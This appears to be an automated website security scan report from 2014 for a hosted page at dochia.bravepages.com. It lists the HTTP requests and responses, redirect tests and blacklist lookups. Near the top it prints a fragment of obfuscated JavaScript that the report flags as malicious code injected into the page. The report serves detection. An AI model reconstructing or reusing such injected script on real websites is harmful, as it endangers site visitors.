Scanned pages/files
| Request | Server response | Status |
http://dochia.bravepages.com/ | 200 OK Content-Length: 11349 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $="Z63eZ3dZ222echaZ2572CoZ2564eZ2541Z2574Z25280)Z255eZ2528Z25270x00Z2527+eZ2573)Z2529);}Z257dZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0 Antivirus reports:
| ||
http://stattrack.0catch.com/python/traffserv/handler | HTTP/1.1 307 Temporary Redirect Connection: close Date: Tue, 16 Dec 2014 09:27:25 GMT Location: http://banner.0catch.com/cgi-bin/popup_mainsite.js Server: Apache/2.2.9 Vary: Accept-Encoding Content-Length: 3 Content-Type: text/plain | clean |
http://banner.0catch.com/cgi-bin/popup_mainsite.js | 200 OK Content-Length: 8 Content-Type: application/x-javascript | clean |
http://stattrack.0catch.com/app/adserv/handler | HTTP/1.1 307 Temporary Redirect Connection: close Date: Tue, 16 Dec 2014 09:27:27 GMT Location: http://redvase.bravenet.com/javascripts/redvase.js Server: Apache/2.2.9 Vary: Accept-Encoding Content-Length: 3 Content-Type: text/plain | clean |
http://redvase.bravenet.com/javascripts/redvase.js | 200 OK Content-Length: 8621 Content-Type: application/x-javascript | clean |
http://stattrack.0catch.com/stat.js | 200 OK Content-Length: 2620 Content-Type: application/javascript | clean |
http://exchange.bravenet.com/exit.php?id=1974761477 | 404 Not Found Content-Length: 16869 Content-Type: text/html | clean |
http://exchange.bravenet.com//assets.bravenet.com/bn/front/js/jquery.min.js/ | 404 Not Found Content-Length: 16869 Content-Type: text/html | clean |
http://exchange.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ | 404 Not Found Content-Length: 16869 Content-Type: text/html | clean |
http://exchange.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ | 404 Not Found Content-Length: 16869 Content-Type: text/html | clean |
http://assets.bravenet.com/bn/js/bnui.js | 200 OK Content-Length: 44626 Content-Type: application/x-javascript | clean |
http://pub2.bravenet.com/counter/code.php?id=390456&usernum=137405393&cpv=2 | 200 OK Content-Length: 334 Content-Type: text/html | clean |
http://pub2.bravenet.com/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 16 Dec 2014 09:27:34 GMT Pragma: no-cache ETag: PUB2-60ac892e539bf2f837023efa1f1f713da4f49bc8-1418722054.5494 Location: http://www.bravenet.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Tue, 16 Dec 2014 09:27:24 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Mon, 16-Dec-2013 09:27:33 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Mon, 16-Dec-2013 09:27:33 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=6pg3bk22qk9vf13nbm7kdomcc2; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Fri, 13-Dec-2024 09:27:34 GMT; path=/; domain=.bravenet.com | clean |
http://www.bravenet.com/test404page.js | 404 Not Found Content-Length: 18189 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/jquery.min.js/ | 404 Not Found Content-Length: 18189 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ | 404 Not Found Content-Length: 18189 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ | 404 Not Found Content-Length: 18189 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dochia.bravepages.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 09:27:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: visited=12%2F16%2F2014; domain=.dochia.bravepages.com; path=/; expires=Wednesday, 07-Dec-2011 12:40:25 AM GMT
Set-Cookie: visited=12%2F16%2F2014; domain=dochia.bravepages.com; path=/; expires=Wednesday, 07-Dec-2011 12:40:25 AM GMT
X-Cache: MISS from squid2.0catch.com
GET / HTTP/1.1
Host: dochia.bravepages.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 09:27:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: visited=12%2F16%2F2014; domain=.dochia.bravepages.com; path=/; expires=Wednesday, 07-Dec-2011 12:40:25 AM GMT
Set-Cookie: visited=12%2F16%2F2014; domain=dochia.bravepages.com; path=/; expires=Wednesday, 07-Dec-2011 12:40:25 AM GMT
X-Cache: MISS from squid2.0catch.com
Second query (visit from search engine):
GET / HTTP/1.1
Host: dochia.bravepages.com
Referer: http://www.google.com/search?q=dochia.bravepages.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dochia.bravepages.com
Referer: http://www.google.com/search?q=dochia.bravepages.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dochia.bravepages.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dochia.bravepages.com/
Result: dochia.bravepages.com is not infected or malware details are not published yet.
Result: dochia.bravepages.com is not infected or malware details are not published yet.